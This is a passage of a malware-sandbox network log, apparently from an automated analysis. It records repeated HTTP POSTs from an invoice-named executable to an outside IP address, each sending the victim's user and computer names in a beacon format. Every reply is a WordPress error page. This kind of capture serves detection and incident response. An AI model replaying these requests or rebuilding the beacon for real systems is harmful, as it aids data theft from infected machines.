                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:25.191401958 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:27.434865952 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:25 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:27.434894085 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:27.434905052 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:27.434916973 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        38192.168.2.849759104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:27.589426041 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:27.594258070 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:29.944237947 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:28 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:29.944261074 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:29.944267988 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        39192.168.2.849760104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:30.094477892 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:30.099349976 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:32.405469894 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:30 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:32.405492067 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:32.405522108 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        40192.168.2.849761104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:32.561924934 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:32.566845894 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:34.819025040 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:33 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:34.819053888 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:34.819070101 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        41192.168.2.849762104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:34.965296030 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:34.970293999 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:37.279594898 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:35 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:37.279619932 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:37.279630899 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        42192.168.2.849763104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:37.436065912 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:37.441389084 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:39.676668882 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:37 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
